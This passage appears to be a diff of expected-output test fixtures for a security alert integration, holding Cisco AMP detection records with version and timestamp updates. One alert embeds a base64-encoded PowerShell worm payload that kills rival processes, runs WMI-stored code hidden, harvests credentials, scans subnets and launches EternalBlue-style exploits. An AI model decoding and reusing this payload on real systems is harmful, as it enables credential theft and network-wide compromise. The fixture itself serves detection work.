AGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}",
                 "id": "6880683125978957000",
                 "kind": "alert"
@@ -2600,7 +2600,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2620,7 +2620,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500191289Z",
+                "ingested": "2021-09-13T18:07:28.111198245Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2675,7 +2675,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2695,7 +2695,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500193359Z",
+                "ingested": "2021-09-13T18:07:28.111200321Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2750,7 +2750,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2770,7 +2770,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500195409Z",
+                "ingested": "2021-09-13T18:07:28.111202401Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2825,7 +2825,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2845,7 +2845,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500197554Z",
+                "ingested": "2021-09-13T18:07:28.111204552Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2902,7 +2902,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2926,7 +2926,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500199614Z",
+                "ingested": "2021-09-13T18:07:28.111206627Z",
